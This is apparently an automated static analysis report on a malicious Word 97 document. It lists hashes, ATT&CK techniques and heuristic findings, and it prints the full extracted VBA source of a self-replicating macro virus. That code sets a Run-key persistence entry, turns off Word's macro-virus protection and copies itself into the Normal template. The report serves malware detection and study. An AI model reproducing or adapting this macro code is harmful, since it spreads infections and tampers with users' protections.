Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 26be5e8f71b9366a…

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-06-12 16:11:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-13
MD5: edc8999de623ef1e6b6f4e197cfe1840 SHA-1: 213225351b17e46a27c2d1b6d3dfee760d5d425c SHA-256: 26be5e8f71b9366ae8f80b807db32cbbb5b998d979c4648879f70d48aed6caaa
168 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Rely on Misinformation

The VBA macro contains logic to disable macro protection and replicate its own code into a new file named 'Jamie.dll'. It also attempts to establish persistence by writing an entry to the registry Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Jamie', pointing to a VBScript that will execute 'Jamie.sys'. This indicates a self-replicating macro designed for persistence and potential further payload delivery.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Print #1, "Jamie.Options.VirusProtection = False"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Print #1, "Private Sub Document_Open()"
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1490 bytes
SHA-256: fb640aa73782bfd78027c9269fa4f3ea570b60cf191393c174b3128ca4f4cef9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
A = Int(Rnd * 99999) & ".vbs"
B = "C:\WINDOWS\SYSTEM\" & A
C = "C:\WINDOWS\SYSTEM\" & "Jamie.sys"
D = "C:\WINDOWS\SYSTEM\" & "Jamie.dll"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = B
End If
ActiveDocument.VBProject.VBComponents.Item(1).Export D
Open B For Output As #1
Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Jamie.Options.VirusProtection = False"
Print #1, "Jamie.Options.SaveNormalPrompt = False"
Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile(" & Chr(34) & C & Chr(34) & ")"""
Print #1, "Jamie.Application.Quit"
Close #1
Open C For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & D & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = x To 3"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
End Sub